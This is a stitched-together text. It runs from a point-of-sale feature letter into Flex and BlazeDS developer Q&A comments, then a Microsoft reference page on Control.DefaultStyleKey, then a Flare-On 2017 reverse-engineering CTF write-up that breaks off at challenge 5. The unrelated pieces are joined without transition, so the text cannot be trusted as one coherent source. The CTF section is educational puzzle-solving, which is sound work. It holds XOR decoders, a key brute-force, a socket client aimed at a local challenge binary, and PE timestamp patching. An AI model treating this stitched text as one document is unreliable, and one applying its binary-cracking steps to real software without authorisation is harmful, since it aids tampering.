When the server is offline and a declining card is used, the last known balance on the client is used and then updated when the server is back online. There is a slight chance that if the server is not brought back online in a timely manner, a person can go into the red if the ID is used on more than one client in a given revenue center. When the server is back online all clients synchronize with the server and the negative balance is reflected. This however does not normally happen and would be resolved the next time the person added more money to their card. The risk of this happening is outweighed by the benefit of not interrupting normal daily POS operation.
The item file that stores all item details and prices including scan codes also needs to be available whether the server is online or offline. All changes and updates (Price change, adding/deleting items, adding Employees and company departments, changes to the UI (adding/deleting/modifying Item buttons, function keys, media keys) made to the client are done through admin portal application that first makes changes to the server side and then are automatically sent to the client. Normally any UI changes will be updated once the client logs off and back on to refresh the touch screen. I hope this can change with Flash and any UI updates can refresh without the user logging off the client.
Reporting of data needs to be available from either the client side or through the admin application. The client side would need to be able to print reports even when the server is offline. Currently, if the server is offline, reports will only be available for transaction completed on the client the report is being generated from. When the server is online, reports can be generated from any client within an individual revenue center for either all clients in the revenue center (Grand Totals) or individual totals for any single client.
Closeout procedures need to be able to run at the revenue center level, either on a single client or on a whole revenue center. These are referred to as an X reading and a Z reading, respectively. Currently this is handled on the client side, where a user runs a Client EOD (end of day) or a Revenue EOD. The Client EOD clears all totals and generates a report that is used to balance the drawer and prepare the bank deposit. The Revenue EOD closes out the revenue center for the day and is run on client #1 in each revenue center. I would also like the ability to run this on the server side once we move to a Flash application.
The application needs to be able to auto-launch when the operating system loads and must not allow the user to access the desktop unless an exit code (known only to an admin) is used to exit the application. The application should not show any part of the desktop. Currently, if a keyboard is connected to the system, a user could gain access to the desktop. We do not see this as an issue because normally a technician or an admin would be the only ones doing this. There is also sometimes the need to have the admin portal running on the client, and the ability to switch between both applications with a keyboard.
There are several main reasons I would like to move to a Flash application. The first is the ability to create a more visually robust application and experience for both the client-side (POS) user and the admin portal user. The second is to have an application that can run on any operating system. The third is to have an application that takes full advantage of Flash Builder technology to more easily deploy changes and new application versions.
I appreciate that you took the time to read through this and I look forward to your response on whether Flash would be a platform that we could use.
Best Regards,
Joe
Hi Sujit,
1) Is there any way to open .txt and Word files in the browser using Flex? If so, please give me one example with code.
2) How do I swap the columns in an AdvancedDataGrid?
hi,
I am using the Flash Builder Burrito trial version. It worked well for a few days; after that, when I open Flash Builder Burrito, the Eclipse startup page appears and then disappears after 30 seconds, and Flash Builder Burrito does not open. What should I do to keep working in it?
Hi, Sujit,
I am new to Flex and model-driven development. I am using Flex 4 and LCDS to build an application that creates two records in a MySQL DB: one record in the Account table and the other in the Employee table. The relationship is one account has many employees.
Account table
idaccount
domainname
Employee table
idemployee
idaccountemployee
A form was created to capture the email; when a button is pressed, it creates a record in the Account table with a slice of the email (the domain part) stored in domainname, and another record in the Employee table with the email stored in emailaddress.
Here is the problem:
How can I assign the value of idaccountemployee, which happens to be the value of idaccount?
example:
Account table
idaccount = 36
domainname = aaa.com
Employee table
idemployee = 92
idaccountemployee will be 36 (same as idaccount)
Hope to hear from you soon!
hi,
I have made changes in Flex; they work fine in design view, but not when I run the application in the browser. Thanks.
Hi Sujit,
Need your help in understanding the feasibility of using Flex for product development. In a nutshell, the GUI will have a hierarchy of components which will be used to design the flow of a specific task. When components are dragged to the design canvas and attributes (data) are assigned to a component, an XML document has to be created with the components' data. When the same task is re-opened, the same design view should appear in the canvas along with the data included in the components.
Can you please tell me if this is doable using Flex? If it is possible, how difficult is it?
Help is really appreciated.
Thanks
Ravindra
Hi Ravindra,
It's definitely doable. See if this link helps
Hi Vaishnavi,
Can you please explain what is not working.
Hi David,
Having a relationship between these two entities in the model should do the work.
Hi Pandi,
Sorry to hear this. Can you please share the .log file. You can find the log file under /.metadata folder. Please send the log file to sujitr@adobe.com
Hi Sreecharan,
If you want to display the text in the Flex application itself, then try loading it using HTTPService and then displaying the content. If you want to display it in the browser, then try navigateToURL.
Hope this helps.
Hi Sagi,
Go with the Data Management Service. If you choose the Data Management Service, it will take care of syncing the data on the client and also manage the data on the client. If you choose the messaging service, then you have to keep the data in sync on the server and the client yourself by exchanging messages. Try having a look at the ASObjectAdapter in the Data Management Service.
Hope this helps.
Hi Sridhar,
You might need to place crossdomain file on your server. Please find more details here
Hope this helps.
Hi Amit,
Please make sure your external folder is included in classpath.
Hope this helps.
Hi Deepak,
Please check this article
Hope this helps.
Hi Jonathan,
Adding a cross domain file is definitely good. If you don’t want to continue to use PHP on server side, you can consider using ZendAMF instead of BlazeDS.
Hi Krishna,
Please find details here
Hope this helps.
Hi lreddy,
Can you please share code to reproduce this.
Hi syeath,
Try adding a web service operation which will let you access the data stored in your server session. Use this operation to get the objects in session onto Flex side.
Hope this helps.
Hi Doby,
BlazeDS has a messaging service with which you can definitely achieve this. Please check the article in the URL below to choose the right channel for your application.
Hope this helps.
Hi Ram,
Check this article
Hi Jitendra,
Once you can successfully invoke the code in the Struts layer, from there you can have any Java class communicate with databases. Try looking for articles which explain how to communicate with databases from Java.
Hi lreddy,
Please try check this URL
Hi Chowdary,
Please check this article. Instead of passing a String as shown in that article, you can pass an instance of your VO. Also check this article
Hope this helps.
Hi Akash,
Is the path to your PHP classes listed in the "used paths" shown in the error log? When deploying Zend on servers, you just need to make sure the amf_config.ini is properly configured; it looks like you have that done, so it should work fine.
Hi Chandu,
Please check if the article in the URL below helps.
Hi Gerald,
Please make sure services-config.xml etc are properly configured. If you can share error details, that will help in understanding what might be going wrong.
Hi Elmak,
Not sure. If you haven't looked at my article below, see if it helps. It does not discuss setting up in Eclipse, though.
Hope this helps.
Hi Sunil,
You can check Data Management service in LCDS else try using messaging service using which you can push data in various ways using different channel types. Please find more details in the URLs below.
Hope this helps.
Hi Edgar,
You might have to add crossdomain file. You can also have a look at clustering. Please find more details in the URLs below.
Hope this helps.
Hi Angela,
If you want to invoke Java classes from Flex applications without any web servers, check this –
If you have Java code on a server and want to invoke the same from client applications, which might be running in a browser or as AIR applications check this –
Hope this helps.
Hi Aubry,
I am sorry, not sure what is going wrong.
Thanks for your reply. Can you do a prototype for me? Can I talk to you in detail?
please send me an e-mail ravindra@idatamatics.com
Thanks
Ravindra
How do I load external fonts dynamically in Flex 4? I need to use them in the RTE. Thanks.
Hi Siva,
Please check “Step 3” in the URL below.
Hi Irfan,
Requests to the server from Flex applications are asynchronous by default. For example, if you have 2 requests made to the server one after another, both are invoked immediately, one after the other.
Hi Amit,
See if you can override a couple of functions in the AMFChannel or NetConnectionChannel classes to get this working. Other than that, I don't know of any other way.
Hope this helps.
Hi Peter,
Please try using the second option and access the Servlet HTTP session. The session created for Remoting calls and this one are the same.
Hope this helps.
Hi Naveen,
Please visit the URL below, you will find options to contact Adobe regarding the pricing etc.
Hi Ravindra,
Sorry, will not able to do a prototype for you.
No issues. Can you please let me know if you know any Flex expert looking for a part-time opportunity?
Really appreciate your help
Hi Sujit,
I want to create and delete destinations dynamically. I am able to create a messaging service destination dynamically, but how can I create a dynamic Remote Object destination?
I am creating Dynamic Messaging Destination using this code
MessageBroker broker = MessageBroker.getMessageBroker(null);
//Get the service
MessageService service = (MessageService) broker.getService(
“message-service”);
MessageDestination msgDest =
(MessageDestination)service.createDestination(id);
But for creating a destination of type RemoteService, there is no Flex class available.
Hi Ravindra,
Please find if this URL below helps.
Hi Vijay,
Please check the article in the URL below.
Hello Sujit,
Could you explain how I would setup my flash builder 4 project to use RestfulX to connect to Couchdb? This is the closest I could find doing a search on Google.
Thank you for your time and effort.
Best regards,
Joe Coyle
Hi Sujit,
I am trying to develop a Flex based NNTP client. Can you please point me in the right direction for this. As in, which particular Flash Builder 4 feature would be helpful here, etc.
Thanks in advance.
Regards,
Pooja
Hi..
i have a datagrid in my web application, i have add a checkbox to datagrid using itemrenderer. how can i get the value of checkbox?
hi sujit,
I am currently pursuing a Bachelor of Engineering at MITCOE, Pune. I am in my final year and need help with my project. My project is a real-time implementation of a train's journey from source to destination, wherein I am trying to create a project for:
1.Automization of signaling
2.Train positioning
3.Track changing
4.Collision avoidance
I have been told to use Flash Builder 4 for the front end (the map of tracks) and then embed this in a .NET program, wherein the position of the train would be shown on the Flash application based on input from the .NET code.
We are depicting the trains and the stations as laptops, such that the train would have a GUI and so would the stations. We are then going to create an ad-hoc network such that the train would send its position via Bluetooth to the station, where the train would be shown as a dot.
So I was wondering if all this is possible with Flash Builder 4 on the front end and .NET on the backend.
Hello Sujit,
I have been trying a simple example using Model Driven Development with Flex Builder 4 and LCDS 3.1 for three weeks. I'm about to lose my mind. I have tried everything I can think of and lots of tutorials, but I couldn't get it working. Please help me;
I get the following error when I run the Flex application:
——————————————————————–
Error: Invalid configuration setting for reconnect. Valid options are IDENTITY or INSTANCE
at mx.data::Metadata/checkReconnect()[C:\depot\DataServices\trunk\frameworks\projects\data\src\mx\data\Metadata.as:2178]
at mx.data::Metadata/applyConfigSettings()[C:\depot\DataServices\trunk\frameworks\projects\data\src\mx\data\Metadata.as:2099]
at Function/()[C:\depot\DataServices\trunk\frameworks\projects\data\src\mx\data\Metadata.as:119]
at mx.data::Metadata/initialize()[C:\depot\DataServices\trunk\frameworks\projects\data\src\mx\data\Metadata.as:181]
at Function/()[C:\depot\DataServices\trunk\frameworks\projects\data\src\mx\data\DataStore.as:3245]
at Function/()[C:\depot\DataServices\trunk\frameworks\projects\data\src\mx\data\DataStore.as:3133]
at mx.data::DataStore/getAllConfigCollections()[C:\depot\DataServices\trunk\frameworks\projects\data\src\mx\data\DataStore.as:3135]
at Function/()[C:\depot\DataServices\trunk\frameworks\projects\data\src\mx\data\DataStore.as:3416]
at flash.events::EventDispatcher/dispatchEventFunction()
at flash.events::EventDispatcher/dispatchEvent()
at mx.messaging::MessageAgent/channelConnectHandler()[E:\dev\4.0.0\frameworks\projects\rpc\src\mx\messaging\MessageAgent.as:903]
at flash.events::EventDispatcher/dispatchEventFunction()
at flash.events::EventDispatcher/dispatchEvent()
at mx.messaging::ChannelSet/channelConnectHandler()[E:\dev\4.0.0\frameworks\projects\rpc\src\mx\messaging\ChannelSet.as:1091]
at flash.events::EventDispatcher/dispatchEventFunction()
at flash.events::EventDispatcher/dispatchEvent()
at mx.messaging::Channel/connectSuccess()[E:\dev\4.0.0\frameworks\projects\rpc\src\mx\messaging\Channel.as:1159]
at mx.messaging.channels::RTMPChannel/setUpMainNC()[C:\depot\DataServices\trunk\frameworks\projects\data\src\mx\messaging\channels\RTMPChannel.as:468]
at mx.messaging.channels::RTMPChannel/tempStatusHandler()[C:\depot\DataServices\trunk\frameworks\projects\data\src\mx\messaging\channels\RTMPChannel.as:610]
Hi Sujit,
I am working on Flex 3 with LCDS. My project is built on JMS queuing. According to my project's requirements, if there are 10 messages waiting in the queue to be read and shown in the Flex UI, it should update only the UI client that is entitled to a particular message. So my question is: how do I identify which client posted the request, and how do I achieve the mapping between the client request and the response in a queue-based scenario?
Is there any built-in mechanism in Flex/LCDS to uniquely identify a client? The approaches I could think of were either tracking session IDs or UIDs.
What would be the best solution according to you?
Please guide me, as I am relatively new to Flex.
Thanks,
Neha
hi sujith ,
I have two doubts:
1. When I try to do a remote object operation and connect to Java code to retrieve values for my data provider, I get
faultCode:Client.Error.MessageSend faultString:’Send failed’ faultDetail:’Channel.Connect.Failed error NetConnection.Call.Failed: HTTP: Status 404: url: ‘”
Why is that?
2. I have to limit my datagrid rows as per the number selected: if 10 is selected, 10 rows must be displayed.
thank u
asha.
Hi sujith,
I am a Flex developer and new to AIR. I have a doubt about how to call a Java class from an AIR application.
Thanks,
Anand
Hi
I have a VBox in which I want to display text, radio buttons and a text area. The text is going to be the same for each VBox, but whether it is a radio button or a text area depends on what kind of question comes from the database. Do I have to use a repeater to display the VBox?
Can you help with how this repeater can choose whether to display radio buttons or a text area by checking the data source?
Hi Sujit,
I am developing an AIR Android application using AS 3.0. I want my Android application to invoke another Android application. I tried creating a custom URI in the manifest XML file, but I don't know how to launch it through ActionScript 3.0. Please guide me.
my xml code of android app being called:
<data android:scheme="callapp"
I used navigateToURL(new URLRequest("callapp://"));
but it did not work.
Thanks in advance.
-Ganesh
Hi,
I'm a new user of Flash Builder 4. I've done a project on a local server (MAMP on Mac OS X) with a PHP service that connects to a MySQL DB. I need to put this project on a real server. When I put it on the server (by FTP; the server runs PHP 5.2.9 and MySQL 5, with the Zend Framework at the root), the project works but I can't get any connection with the PHP service. I have been searching the web for two days and trying a lot of tips, but nothing changes. Can you help me?
best regards
A few hours later, still this error:
Class “IntervenantsService” does not exist: Plugin by name ‘IntervenantsService’ was not found in the registry; used paths:
:
#0 /web/hosts/: Zend_Amf_Server->_dispatch(‘verifIntervenan…’, Array, ‘IntervenantsSer…’)
#1 /web/hosts/: Zend_Amf_Server->_handle(Object(Zend_Amf_Request_Http))
#2 /web/hosts/: Zend_Amf_Server->handle()
#3 {main}
Help me if you can. I don't get any answer from the documentation or any tutorial.
Hi Pooja,
If you are asking if DCD features in Flash Builder will help in building NNTP clients, I am sorry it doesn’t.
Hi Nirav,
You can override the setter function of the "data" property and store the updated value in one of your properties. You can access the objects from the dataProvider property of the DataGrid. Alternatively, you can also try dispatching an event.
Hope this helps.
Hi Tanay,
Yes, its possible.
Hi Kemal,
Can you please share the fml file.
Hi Neha,
Please check this article
Hope this helps.
Hi Henri,
Is ‘IntervenantsService’ class developed by you?
Hi, thanks for helping me
The php class is done by fb by a connection at my mysql local base ( a copy of my real one)
I have change some sql request inside but nothing more.
I can send you the code if it can help to understand the problem
best regards
Hi Henri,
Please try following the steps below:
1. Make sure ZendAMF is deployed on your server. This is a folder named “ZendFramework”
2. Change settings in amf_config.ini if required. You can find this file in your web application folder.
Hope this helps.
Hi Ganesh,
Please check if the URLs below:
Hope this helps.
Hi Anil,
You can chose to use repeater or any List based components. If you are using Flex 4, you can try DataGroup component as well.
Hi Asha,
Looks like either your server is down or BlazeDS is not properly configured. For second one, check this
hi,
Amf_config.ini is set as follow :
[zend]
webroot =
zend_path = ../ZendFramework/library
[zendamf]
amf.production = true
amf.directories[] =backoffice/services
The response of the gateway without any variable is "Zend Amf Endpoint", so it seems to be working.
If I change anything in the amf_config.ini I get a "channel disconnected" error.
I really don't have any idea of what is going wrong…
thanks a lot for your help.
best regards
Hi Sujit,
I am quite new to Flex.
I have a Struts 2.0 page which should have a graph and 2 datagrids.
For the chart, I am trying to use Flex.
I am trying to pass an ArrayList of objects to a Flex SWF/MXML file through the HttpRequest object.
The MXML will NOT call any Java RemoteService/HTTPService or web service.
In this case, how will my .as file map to the Java object?
Looking forward to your reply.
Thanks
Is it possible to check login credentials against a local database (SQLite) without any server-side scripting?
Meaning: get the username and password and check them against user info in the database in order to log in.
Is it possible to do this in AS3 only?
thanks
Hi Sujit,
I am using Fiber, RDS, and LCDS. I am to the point where I would like to build a real app, but security is a major concern.
Is it possible to secure the destinations created by Fiber/RDS? I know how to secure destinations that I define in remoting-services.xml, but I can’t figure out how to secure the dynamic destinations created by Fiber/RDS. I have created my own custom authentication/authorization LoginCommand class that does the actual authentication. How do I configure Fiber/RDS to use that custom class?
Thank you,
Collin
Hi Sujit,
Need your help; it's very urgent. We need to develop a data management system using Flex and AIR, and the application also has to work offline; when it comes back online, the data has to sync.
For this, LCDS & Clear Toolkit are available, but the client is very small and can't afford an LCDS licence, and Clear Toolkit won't even install properly.
Can you please suggest any way to provide offline & online operation with sync? If you give us some guidelines, we can develop it. I have already seen how LCDS works, but building that ourselves may take a lot of time. Can you please suggest any ideas?
thanks
vijay
Hi Sujit,
I am Mohan, working in Flex, and I have a problem: how do I reduce the loading time of the application?
Instead of using embed, is there any other way to supply a skin at runtime?
How do I reduce the SWF file size for release?
Hi Sujith, I am a Java programmer. I have gone through articles on Flex but still need to learn it properly. Can you please suggest a good way to learn Flex?
sir,
I am a final year engineering student, we are doing a project for:
1:positiong of train .
2:collision avoidance.
my problem:
MXML has a tag. It can have 'xFrom', 'xTo' and 'xBy' attributes, and if all three are given together MXML ignores xBy, but we need to specify all 3 to make the train move along a path and to make it cover a certain number of pixels, thus showing the train's current location.
We are using lines (paths) as individual entities to simulate movement. Is it possible to treat an entire path as a single object and make the rectangle move along this object?
Hi Sujit,
I attended your workshop on developing multiscreen applications using Flex at IIIT (during the AVM annual meet),
which is good for when we want to develop mobile apps.
Should I go for J2ME, or for the new Flex features in Flash Builder 4.5 "Burrito"?
I am a Java programmer; which platform should I choose for developing mobile apps?
I am interested in Flex too.
One more question: which is better when we compare JavaFX and Flex? I don't know about JavaFX.
hi sujit
We are building an application in Flash Builder 4.
I am using a tag to move a rectangle.
I want to control the speed of this rectangle via a VSlider. How do I achieve this?
I am using a tag to move it.
SORRY for sending this once again; I had not checked the notify and subscribe check boxes while posting.
Hi Sujit,
I am a beginner in Flex. I am developing a whiteboard application in Flex. The board becomes very slow after a few minutes. It seems that this is because of the persistence of graphics.draw commands. Is there any option to negate this effect?
Thanks in advance,
Best regards
Binu
Hi Sujit.
I am hoping you can help me out on this issue.
I am trying out mobile application development with Flex 4.5, following the tutorial "Build a mobile application in an hour", and for the past three days I have been stuck trying to connect the Data Services in the IDE to the BlazeDS-based application running on Tomcat.
The error message reads "RDS server message: could not initialize class com.adobe.rds.core.services.Messages".
I have checked the URL multiple times and it is correctly pointing to the BlazeDS turnkey server running on port 8400. The call to test.html to check the testdrive application works correctly. Also, when I call the RDS URL I get a blank page as expected. The project's Flex server settings are:
Root folder: C:\blazeds-turnkey-4\tomcat\webapps\testdrive
Root URL:
Context root: /testdrive
Output folder: C:\blazeds-turnkey-4\tomcat\webapps\testdrive\MobileTestDrive-debug
Any suggestions on how I get beyond this point will be greatly appreciated.
Dear Sujit
I have got a Galaxy Tab P1000; it is great, but I have a problem with Flash Player.
Flash Player works well with Vimo for video, but for applications: I had a Flex 3 app that works well on the tablet with FP 10.1, while a Flex 4 Spark app gets error #204.
I have updated FP to 10.2 but I still get error #204.
What do you think? Is it a problem with Spark on the Android version of FP?
What must I do to overcome it?
BR
Farid Valipour
Hi Sujit,
I have a quick question about BlazeDS. I'm wondering how you can turn off the "batching" it does when you fire multiple requests to the same service. Our application needs to return data for a number of widgets as the data becomes available, but since we fire the requests when the app loads, it appears BlazeDS batches them into one request and then the server batches the responses.
Any help would be appreciated.
Hi,
I am a Flex+PHP developer trying to use Java on the backend. I have followed your instructions multiple times but am still not able to set up services through the BlazeDS server. I am not getting the service list at the "Selecting Remoting destination" stage. I have made the change in services-config.xml and added
tutorial.HelloWorld
to remoting-config.xml, whereas I have already created a RemoteObject with destination "datagridService" in the .mxml file.
Please tell me if any other changes are required. I am getting this error: "No destinations configured on server. Click on 'How to use BlazeDS/LCDS?' link to know how to configure destinations."
Help me.
Hi Sujit,
I am basically a Java programmer. In my project I am using BlazeDS for interfacing Java and Flex. In my Java program I have an object which contains a BitSet, but in the Flex code I am not able to get this BitSet; instead it just arrives as a regular Object. Can you suggest how to send the BitSet from the Java object to the Flex code?
Control.DefaultStyleKey Property
Definition
Gets or sets the key that references the default style for the control. Authors of custom controls use this property to change the default for the style that their control uses.
Equivalent WinUI property: Microsoft.UI.Xaml.Controls.Control.DefaultStyleKey.
protected: property Platform::Object ^ DefaultStyleKey { Platform::Object ^ get(); void set(Platform::Object ^ value); };
IInspectable DefaultStyleKey(); void DefaultStyleKey(IInspectable value);
protected object DefaultStyleKey { get; set; }
Protected Property DefaultStyleKey As Object
Property Value
The key that references the default style for the control. To work correctly as part of theme style lookup, this value is expected to be a System.Type value.
Note
Visual C++ component extensions (C++/CX) uses a string that is the qualified name of the type. But this relies on generated code that produces a TypeName once accessed by a XAML compiler; see Remarks.
Remarks
DefaultStyleKey is one of the very few protected properties in the Windows Runtime API. It's intended only for use by control authors, who will be subclassing some existing control class and therefore have the necessary access to set this property. For many custom control scenarios where you'll be setting DefaultStyleKey, you'll also be overriding OnApplyTemplate.
The return type of DefaultStyleKey is loosely typed as Object in the syntax, but the XAML style system will expect the value to provide a type reference:
- For a control that has its logic written in C#, the value of DefaultStyleKey should be an instance of System.Type. Typically you set this value in the default constructor:
public CustomControl1() { this.DefaultStyleKey = typeof(CustomControl1); }
- For a control that has its logic written in Microsoft Visual Basic, the value of DefaultStyleKey should be an instance of System.Type. Typically you set this value in the default constructor:
Public Sub New() Me.DefaultStyleKey = GetType(CustomControl1) End Sub
- For a control that has its logic written in C++/WinRT, the value is a boxed string set in the default constructor:
CustomControl1::CustomControl1() // public: in the header. { DefaultStyleKey(winrt::box_value(L"App1.CustomControl1")); }
- For a control that has its logic written in Visual C++ component extensions (C++/CX), the value of DefaultStyleKey should be a namespace-qualified string that is the name of the custom control class. Typically you set this value in the default constructor:
CustomControl1::CustomControl1() //public: in the header { DefaultStyleKey = "App1.CustomControl1"; }
Note
Ultimately the string alone isn't enough to support a Visual C++ component extensions (C++/CX) type reference. If you use the Add / New Item / Templated Control options in Solution Explorer, the templates and support for Visual C++ component extensions (C++/CX) and XAML generates classes that give IXamlMetadataProvider info. The XAML compiler can access this code when the XAML is loaded, and uses it to validate and create types and members and join the partial classes. As far as what you define in your own app code, the string is all you need. But if you're curious you can have a look at the XamlTypeInfo.g.h and XamlTypeInfo.g.cpp files that are generated.
Control authors could choose to not provide a value for DefaultStyleKey, but that's uncommon. The result would be that the default style is the one as defined by the base class. In some cases (like for ContentControl ) the value is null. Even if you choose to not redefine the value, make sure that the original default style is useful for rendering your control.
When a XAML control is loaded, the rendering process starts, and the system is looking for the correct template to apply; what's being loaded is the XAML default style for the control, including its template. Included in the Windows Runtime is an internal copy of all the default styles for all the XAML controls that the Windows Runtime defines. The type reference in DefaultStyleKey tells the system which named XAML resource to load as this style. In XAML form, the styles really are keyed by type even though there's no mechanism in Windows Runtime XAML that defines a type reference explicitly. But for any TargetType value, which is the attribute that holds the key for lookup, it's implicitly assumed to represent a type reference in the form of a string. For example, DefaultStyleKey from a Button is a System.Type instance where the Name is "Button" and FullName is "Windows.UI.Xaml.Controls.Button". The system uses this info to know to load the Style from the internal resources that has TargetType="Button".
Custom controls usually aren't in the default XAML namespace. Instead, they're in a XAML namespace that has a using: statement to reference the app's code namespace. By default, projects create a prefix "local:" that maps this namespace for you. You could also map other XAML namespaces to refer to additional code namespaces for controls or other code that your app defines.
The "local:" prefix (or some other namespace that maps to your app's code and namespaces) should precede the name of your custom control, when it's in XAML as the TargetType value. This is also already done for you by the starting templates; when you add a new control, you'll see a generic.xaml file that contains just one style. That style will have TargetType value that is a string starting with "local:" and completed by the name you chose for your custom control class. To match previous examples that set DefaultStyleKey in a
CustomControl1 definition, you'd see an element for
<Style TargetType="local:CustomControl1"> defined in the starting generic.xaml, and that style defines the control template as well as setting other properties.
Note
The "local:" prefix is isolated to the XAML where it's defined and used. XAML namespaces and the prefixes only have meaning within XAML and are self-contained to each XAML file. DefaultStyleKey values in code don't include the prefixes.
This year, I finally happened to be in a good position to play Flare-On CTF, a yearly CTF published by FireEye. This year's edition offered 12 reverse-engineering challenges to solve in 6 weeks.
This post is mostly a dump of the notes taken during the challenges. Links to the challenges and scripts are also given.
All the challenges are in the ZIP file that you can download here.
The Arsenal
My complete arsenal was (in no particular order):
- Modern-IE Windows VM
- IDA Pro
- WinDBG
- CFF Explorer
- HxD
- PEiD
- AIP Monitor
- SysInternals Suite
- Binary Ninja
- GDB + GEF
- SimAVR
- JDB
- JADX
- GenyMotion
- Python modules:
- DnSpy
- Interactive Delphi Reconstructor
- Wireshark
- Diaphora
- xdotool
And a lot of C and Python snippets…
Challenge 1
Instruction
Welcome to the Fourth Flare-On Challenge! The key format, as always, will be a valid email address in the @flare-on.com domain.
Solution
By checking the HTML source code, we see:
Classic ROT-13, can be decoded by:
>>> "PyvragFvqrYbtvafNerRnfl@syner-ba.pbz".decode("rot13") ClientSideLoginsAreEasy@flare-on.com
Challenge 2
Instruction
You solved that last one really quickly! Have you ever tried to reverse engineer a compiled x86 binary? Let's see if you are still as quick.
Solution
IgniteMe.exe is a small PE that reads a buffer from stdin and chain-XORs it in reverse (with an IV set to 4 by the function at 0x00401000); the result is then compared to an encoded_key located at 0x0403000:
00403000  0d 26 49 45 2a 17 78 44-2b 6c 5d 5e 45 12 2f 17  .&IE*.xD+l]^E./.
00403010  2b 44 6f 6e 56 09 5f 45-47 73 26 0a 0d 13 17 48  +DonV._EGs&....H
00403020  42 01 40 4d 0c 02 69 00                          B.@M..i.
It's a classic simple XOR-encoding challenge; the script IgniteMe.py was used to decode it:
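For reference, here is a minimal sketch of what the decoder does (the IV of 4 is the value returned by the function at 0x00401000, and the trailing NUL of the dump is treated as padding and dropped):

# Minimal sketch of the chained-XOR decoder (the spirit of IgniteMe.py)
enc = bytes.fromhex(
    "0d2649452a1778442b6c5d5e45122f17"
    "2b446f6e56095f454773260a0d131748"
    "4201404d0c0269"
)
v = 4
out = bytearray(len(enc))
for i in range(len(enc) - 1, -1, -1):
    out[i] = enc[i] ^ v   # undo one step of the reverse XOR chain
    v = out[i]            # the next key byte is this plaintext byte
print(out.decode())       # R_y0u_H0t_3n0ugH_t0_1gn1t3@flare-on.com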
$ py IgniteMe.py
[...]
result R_y0u_H0t_3n0ugH_t0_1gn1t3@flare-on.com
Challenge 3
Instruction
Now that we see you have some skill in reverse engineering computer software, the FLARE team has decided that you should be tested to determine the extent of your abilities. You will most likely not finish, but take pride in the few points you may manage to earn yourself along the way.
Solution
greek_to_me is a PE file that starts by binding and listening on tcp/2222, and receiving 4 bytes from the socket. The value read is then used to decode the instructions at 0x40107c to 0x4010ee:
Being lazy, I reconstructed a C script from the IDA decompiler output, which allowed me to simply bruteforce the value locally:
$ make greek_to_me
$ ./greek_to_me
Starting new process 31673 with range(0, 0x20000000)
[...]
Found valid key: 536871074
Found valid key: 1610612898
Found valid key: 1073741986
With those keys, we can re-run the binary and send one of these values (properly encoded) to the socket on tcp/2222:
import socket, sys, struct

valid_keys = [162, 536871074, 1610612898, 1073741986]

def p32(x):
    return struct.pack("I", x)

s = socket.socket()
s.connect(("127.0.0.1", 2222))
s.send(p32(int(sys.argv[1])))
print s.recv(0x100)
which will show as a response:
Congratulations! But wait, where's my flag?
But by setting WinDBG to break at 0x040107c and passing the correct decoding key when prompted, a whole new block of code shows up:
Revealing the key to this level.
Challenge 4
Instruction
You're using a VM to run these right?
Solution
This challenge was very fun at the beginning, but the last part really sucked:
notepad.exe is a small PE that by all appearances spawns the classic Windows Notepad. I was fooled for a bit at first by the instruction for this challenge; I expected a malware or something hostile, but it is nothing of the sort. Disassembling the start function in IDA shows a bunch of interesting strings:
%USERPROFILE%\flareon2016challenge ImageHlp.dll CheckSumMappedFile User32.dll MessageBoxA
So I created the folder
flareon2016challenge and spawned
procmon:
clearly showing that notepad is looking for something in this directory. Breaking on Kernel32!FindFirstFile, we discover that the loop at 0x10140B0 performs a classic file lookup in the directory, calling the function at 0x1014E20 when a file is found. That's where stuff gets interesting.
notepad maps the file in memory, checks if it starts with MZ, gets the value at offset 0x3c, then jumps to that offset and checks if the mmapped memory there is equal to PE. It looks like it is searching for one or more valid PE executables in the flareon2016challenge folder. It does a few extra checks (is the machine type Intel in the PE header, etc.) and if everything passes, calls 0x010146C0.
This function takes the timestamps from the PE headers of the current program (notepad.exe) and of the PE file mapped to memory. If those 2 values are the ones expected, then 2 functions are called successively:
- Function @ 0x1014350 which will format the timestamp of the mapped file and
MessageBox-it
- Function @ 0x1014BAC which will open a file key.bin in the flareon2016challenge folder and write 8 bytes from some offset in the mapped file into it.
Or in horrible pseudo-code:
encoded_buffer = [0x37, 0xe7, 0xd8, 0xbe, etc..]  # populated at 010148F3

if notepad.pe.timestamp == '2008-04-13 11:35:51' and mmap.pe.timestamp == '2016-09-08 11:49:06':
    MessageBox('2016-09-08 11:49:06')
    Write_8_Bytes_From(src=mmap, dst='key.bin')
elif notepad.pe.timestamp == '2016-09-08 11:49:06' and mmap.pe.timestamp == '2016-09-09 05:54:16':
    MessageBox('2016-09-09 05:54:16')
    Write_8_Bytes_From(src=mmap, dst='key.bin')
elif notepad.pe.timestamp == '2016-09-09 05:54:16' and mmap.pe.timestamp == '2008-11-10 01:40:34':
    MessageBox('2008-11-10 01:40:34')
    Write_8_Bytes_From(src=mmap, dst='key.bin')
elif notepad.pe.timestamp == '2008-11-10 01:40:34' and mmap.pe.timestamp == '2016-07-31 17:00:00':
    MessageBox('2016-07-31 17:00:00')
    Write_8_Bytes_From(src=mmap, dst='key.bin')
elif notepad.pe.timestamp == '2016-07-31 17:00:00':
    key = ReadFileContent('key.bin')
    assert len(key) == 0x20
    decoded_key = DecodeWithKey(encoded_buffer, key)
    MessageBox(decoded_key)
So now we know how the decoding key is built, but we don’t know which PE to use. This guessing game made me lose too much time. The hint was to use 2016 PE files from last year’s FlareOn challenge.
In the many folders of the FlareOn3 archive (pass: flare), we can find several PE files whose timestamps match perfectly with the ones we are looking for. All we need to do now is drop those files in the flareon2016challenge directory and tweak notepad.exe to update its timestamp. After 4 executions we get the key.bin file properly filled:
➜ xd ~/ctf/flareon_2017/4/key.bin
00000000  55 8b ec 8b 4d 0c 56 57 8b 55 08 52 ff 15 30 20  |U...M.VW.U.R..0 |
00000010  c0 40 50 ff d6 83 c4 08 00 83 c4 08 5d c3 cc cc  |.@P.........]...|
00000020
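To tweak the timestamps between runs, a small helper using the pefile module can patch the TimeDateStamp field of the COFF header (a hedged sketch; the helper name and the ".patched" output suffix are mine, and timestamps are interpreted as UTC):

# Hedged helper: stamp an arbitrary build date into a PE header.
# Assumes the pefile module; writes the result next to the input file.
import calendar
import time
import pefile

def set_pe_timestamp(path, date_str):
    ts = calendar.timegm(time.strptime(date_str, "%Y-%m-%d %H:%M:%S"))
    pe = pefile.PE(path)
    pe.FILE_HEADER.TimeDateStamp = ts   # COFF header TimeDateStamp field
    pe.write(path + ".patched")

set_pe_timestamp("notepad.exe", "2016-09-08 11:49:06")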
And after updating
notepad to the last PE timestamp, we get:
Challenge 5
Instruction
